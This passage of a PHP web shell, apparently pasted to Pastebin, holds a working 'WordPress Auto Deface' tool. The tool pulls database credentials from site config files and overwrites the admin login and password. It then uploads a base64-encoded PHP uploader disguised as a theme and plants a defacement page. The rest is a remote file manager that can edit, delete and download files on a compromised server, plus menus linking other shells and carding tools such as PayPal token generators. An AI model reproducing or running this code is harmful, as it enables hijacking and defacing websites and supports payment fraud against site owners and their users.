  3820.                 if(!$conn OR !$db OR !$update) {
  3821.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3822.                     mysql_close($conn);
  3823.                 } else {
  3824.                     $site = "$target/wp-login.php";
  3825.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  3826.                     $b1 = anucurl($site2);
  3827.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3828.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3829.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3830.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3831.                     $www = "m.php";
  3832.                     $fp5 = fopen($www,"w");
  3833.                     fputs($fp5,$upload3);
  3834.                     $post2 = array(
  3835.                             "_wpnonce" => "$anu2",
  3836.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3837.                             "themezip" => "@$www",
  3838.                             "install-theme-submit" => "Install Now",
  3839.                             );
  3840.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3841.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3842.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3843.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3844.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3845.                           curl_setopt($ch, CURLOPT_POST, 1);
  3846.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3847.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3848.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3849.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3850.                     $data3 = curl_exec($ch);
  3851.                           curl_close($ch);
  3852.                     $y = date("Y");
  3853.                     $m = date("m");
  3854.                     $namafile = "id.php";
  3855.                     $fpi = fopen($namafile,"w");
  3856.                     fputs($fpi,$script);
  3857.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3858.                            curl_setopt($ch6, CURLOPT_POST, true);
  3859.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3860.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3861.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3862.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3863.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3864.                     $postResult = curl_exec($ch6);
  3865.                            curl_close($ch6);
  3866.                     $as = "$target/k.php";
  3867.                     $bs = anucurl($as);
  3868.                     if(preg_match("#$script#is", $bs)) {
  3869.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3870.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3871.                         } else {
  3872.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  3873.                         echo "[!!] coba aja manual: <br>";
  3874.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3875.                         echo "[+] username: <font color=lime>$user</font><br>";
  3876.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  3877.                         }
  3878.                     mysql_close($conn);
  3879.                 }
  3880.             }
  3881.         }
  3882.     } else {
  3883.         echo "<center><h1>WordPress Auto Deface</h1>
  3884.         <form method='post'>
  3885.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3886.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Achon666ju5t' required><br>
  3887.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3888.         </form>
  3889.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3890.         </center>";
  3891.     }
  3892. } elseif($_GET['do'] == 'auto_dwp2') {
  3893.     if($_POST['auto_deface_wp']) {
  3894.         function anucurl($sites) {
  3895.             $ch = curl_init($sites);
  3896.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3897.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3898.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3899.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3900.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3901.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3902.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3903.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3904.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3905.             $data = curl_exec($ch);
  3906.                   curl_close($ch);
  3907.             return $data;
  3908.         }
  3909.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3910.             $post = array(
  3911.                    "log" => "$userr",
  3912.                    "pwd" => "$pass",
  3913.                    "rememberme" => "forever",
  3914.                    "wp-submit" => "$wp_submit",
  3915.                    "redirect_to" => "$web",
  3916.                    "testcookie" => "1",
  3917.                    );
  3918.             $ch = curl_init($cek);
  3919.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3920.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3921.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3922.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3923.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3924.                   curl_setopt($ch, CURLOPT_POST, 1);
  3925.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3926.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3927.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3928.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3929.             $data = curl_exec($ch);
  3930.                   curl_close($ch);
  3931.             return $data;
  3932.         }
  3933.         $link = explode("\r\n", $_POST['link']);
  3934.         $script = htmlspecialchars($_POST['script']);
  3935.         $user = "indoxploit";
  3936.         $pass = "indoxploit";
  3937.         $passx = md5($pass);
  3938.         foreach($link as $dir_config) {
  3939.             $config = anucurl($dir_config);
  3940.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  3941.             $dbuser = ambilkata($config,"DB_USER', '","'");
  3942.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3943.             $dbname = ambilkata($config,"DB_NAME', '","'");
  3944.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3945.             $prefix = $dbprefix."users";
  3946.             $option = $dbprefix."options";
  3947.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3948.             $db = mysql_select_db($dbname);
  3949.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3950.             $result = mysql_fetch_array($q);
  3951.             $id = $result[ID];
  3952.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3953.             $result2 = mysql_fetch_array($q2);
  3954.             $target = $result2[option_value];
  3955.             if($target == '') {                
  3956.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3957.             } else {
  3958.                 echo "[+] $target <br>";
  3959.             }
  3960.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3961.             if(!$conn OR !$db OR !$update) {
  3962.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3963.                 mysql_close($conn);
  3964.             } else {
  3965.                 $site = "$target/wp-login.php";
  3966.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  3967.                 $b1 = anucurl($site2);
  3968.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3969.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3970.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3971.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3972.                 $www = "m.php";
  3973.                 $fp5 = fopen($www,"w");
  3974.                 fputs($fp5,$upload3);
  3975.                 $post2 = array(
  3976.                         "_wpnonce" => "$anu2",
  3977.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3978.                         "themezip" => "@$www",
  3979.                         "install-theme-submit" => "Install Now",
  3980.                         );
  3981.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3982.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3983.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3984.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3985.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3986.                       curl_setopt($ch, CURLOPT_POST, 1);
  3987.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3988.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3989.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3990.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3991.                 $data3 = curl_exec($ch);
  3992.                       curl_close($ch);
  3993.                 $y = date("Y");
  3994.                 $m = date("m");
  3995.                 $namafile = "id.php";
  3996.                 $fpi = fopen($namafile,"w");
  3997.                 fputs($fpi,$script);
  3998.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3999.                        curl_setopt($ch6, CURLOPT_POST, true);
  4000.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4001.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4002.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4003.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4004.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  4005.                 $postResult = curl_exec($ch6);
  4006.                        curl_close($ch6);
  4007.                 $as = "$target/k.php";
  4008.                 $bs = anucurl($as);
  4009.                 if(preg_match("#$script#is", $bs)) {
  4010.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4011.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4012.                     } else {
  4013.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  4014.                     echo "[!!] coba aja manual: <br>";
  4015.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4016.                     echo "[+] username: <font color=lime>$user</font><br>";
  4017.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  4018.                     }
  4019.                 mysql_close($conn);
  4020.             }
  4021.         }
  4022.     } else {
  4023.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  4024.         <form method='post'>
  4025.         Link Config: <br>
  4026.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  4027.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Achon666ju5t' required><br>
  4028.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4029.         </form></center>";
  4030.     }
  4031. } elseif($_GET['act'] == 'newfile') {
  4032.     if($_POST['new_save_file']) {
  4033.         $newfile = htmlspecialchars($_POST['newfile']);
  4034.         $fopen = fopen($newfile, "a+");
  4035.         if($fopen) {
  4036.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4037.         } else {
  4038.             $act = "<font color=red>permission denied</font>";
  4039.         }
  4040.     }
  4041.     echo $act;
  4042.     echo "<form method='post'>
  4043.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  4044.     <input type='submit' name='new_save_file' value='Submit'>
  4045.     </form>";
  4046. } elseif($_GET['act'] == 'newfolder') {
  4047.     if($_POST['new_save_folder']) {
  4048.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4049.         if(!mkdir($new_folder)) {
  4050.             $act = "<font color=red>permission denied</font>";
  4051.         } else {
  4052.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4053.         }
  4054.     }
  4055.     echo $act;
  4056.     echo "<form method='post'>
  4057.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  4058.     <input type='submit' name='new_save_folder' value='Submit'>
  4059.     </form>";
  4060. } elseif($_GET['act'] == 'rename_dir') {
  4061.     if($_POST['dir_rename']) {
  4062.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  4063.         if($dir_rename) {
  4064.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4065.         } else {
  4066.             $act = "<font color=red>permission denied</font>";
  4067.         }
  4068.     echo "".$act."<br>";
  4069.     }
  4070.     echo "<form method='post'>
  4071.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4072.     <input type='submit' name='dir_rename' value='rename'>
  4073.     </form>";
  4074. } elseif($_GET['act'] == 'delete_dir') {
  4075.     function Delete($path)
  4076. {
  4077.     if (is_dir($path) === true)
  4078.     {
  4079.         $files = array_diff(scandir($path), array('.', '..'));
  4080.         foreach ($files as $file)
  4081.         {
  4082.             Delete(realpath($path) . '/' . $file);
  4083.         }
  4084.         return rmdir($path);
  4085.     }
  4086.     else if (is_file($path) === true)
  4087.     {
  4088.         return unlink($path);
  4089.     }
  4090.     return false;
  4091. }
  4092.     $delete_dir = Delete($dir);
  4093.     if($delete_dir) {
  4094.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4095.     } else {
  4096.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4097.     }
  4098.     echo $act;
  4099. } elseif($_GET['act'] == 'view') {
  4100.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4101.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4102. } elseif($_GET['act'] == 'edit') {
  4103.     if($_POST['save']) {
  4104.         $save = file_put_contents($_GET['file'], $_POST['src']);
  4105.         if($save) {
  4106.             $act = "<font color=lime>Saved!</font>";
  4107.         } else {
  4108.             $act = "<font color=red>permission denied</font>";
  4109.         }
  4110.     echo "".$act."<br>";
  4111.     }
  4112.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4113.     echo "<form method='post'>
  4114.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4115.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  4116.     </form>";
  4117. } elseif($_GET['act'] == 'rename') {
  4118.     if($_POST['do_rename']) {
  4119.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4120.         if($rename) {
  4121.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4122.         } else {
  4123.             $act = "<font color=red>permission denied</font>";
  4124.         }
  4125.     echo "".$act."<br>";
  4126.     }
  4127.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4128.     echo "<form method='post'>
  4129.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4130.     <input type='submit' name='do_rename' value='rename'>
  4131.     </form>";
  4132. } elseif($_GET['act'] == 'delete') {
  4133.     $delete = unlink($_GET['file']);
  4134.     if($delete) {
  4135.         $act = "<script>window.location='?dir=".$dir."';</script>";
  4136.     } else {
  4137.         $act = "<font color=red>permission denied</font>";
  4138.     }
  4139.     echo $act;
  4140. }else {
  4141.     if(is_dir($dir) == true) {
  4142.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4143.         <tr>
  4144.         <th class="th_home"><center>Name</center></th>
  4145.         <th class="th_home"><center>Type</center></th>
  4146.         <th class="th_home"><center>Size</center></th>
  4147.         <th class="th_home"><center>Last Modified</center></th>
  4148.         <th class="th_home"><center>Permission</center></th>
  4149.         <th class="th_home"><center>Action</center></th>
  4150.         </tr>';
  4151.         $scandir = scandir($dir);
  4152.         foreach($scandir as $dirx) {
  4153.             $dtype = filetype("$dir/$dirx");
  4154.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4155.             if(!is_dir("$dir/$dirx")) continue;
  4156.             if($dirx === '..') {
  4157.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4158.             } elseif($dirx === '.') {
  4159.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  4160.             } else {
  4161.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4162.             }
  4163.             if($dirx === '.' || $dirx === '..') {
  4164.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4165.                 } else {
  4166.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4167.             }
  4168.             echo "<tr>";
  4169.             echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4170.             echo "<td class='td_home'><center>$dtype</center></td>";
  4171.             echo "<td class='td_home'><center>-</center></th>";
  4172.             echo "<td class='td_home'><center>$dtime</center></td>";
  4173.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4174.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4175.         }
  4176.         echo "</tr>";
  4177.         foreach($scandir as $file) {
  4178.             $ftype = filetype("$dir/$file");
  4179.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4180.             $size = filesize("$dir/$file")/1024;
  4181.             $size = round($size,3);
  4182.             if($size > 1024) {
  4183.                 $size = round($size/1024,2). 'MB';
  4184.             } else {
  4185.                 $size = $size. 'KB';
  4186.             }
  4187.             if(!is_file("$dir/$file")) continue;
  4188.             echo "<tr>";
  4189.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4190.             echo "<td class='td_home'><center>$ftype</center></td>";
  4191.             echo "<td class='td_home'><center>$size</center></td>";
  4192.             echo "<td class='td_home'><center>$ftime</center></td>";
  4193.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4194.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4195.         }
  4196.         echo "</tr></table>";
  4197.     } else {
  4198.         echo "<font color=red>can't open directory</font>";
  4199.     }
  4200.     }
  4201. echo "<center><hr><form>
  4202. <select onchange='if (this.value) window.open(this.value);'>
  4203.    <option selected='selected' value=''> Tools Creator </option>
  4204.    <option value='$ling=wso'>WSO 2.8.1</option>
  4205.    <option value='$ling=injection'>1n73ction v3</option>
  4206.    <option value='$ling=wk'>WHMCS Killer</option>
  4207.    <option value='$ling=adminer'>Adminer</option>
  4208.    <option value='$ling=b374k'>b374k Shell</option>
  4209.    <option value='$ling=b374k323'>b374k 3.2</option>  
  4210.    <option value='$ling=bh'>BlackHat Shell</option>      
  4211.    <option value='$ling=dhanus'>Dhanush Shell</option>    
  4212.    <option value='$ling=r57'>R57 Shell</option>    
  4213. <option value='$ling=encodedecode'>Encode Decode</option>    
  4214. <option value='$ling=r57'>R57 Shell</option>    
  4215. </select>
  4216. <select onchange='if (this.value) window.open(this.value);'>
  4217.    <option selected='selected' value=''> Tools Carder </option>
  4218.    <option value='$ling=extractor'>DB Email Extractor</option>
  4219.    <option value='$ling=MailerDelay'>MAILER YA Chonx</option>    
  4220.    <option value='$ling=bukalapak'>BukaLapak Checker</option>        
  4221.    <option value='$ling=tokopedia'>TokoPedia Checker</option>  
  4222.    <option value='$ling=tokenpp'>Paypal Token Generator</option>  
  4223.    <option value='$ling=mailer'>Mailer</option>  
  4224.    <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4225.    </select>
  4226. <noscript><input type='submit' value='Submit'></noscript>
  4227. </form></font></center>";
  4228. ?>
  4229. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top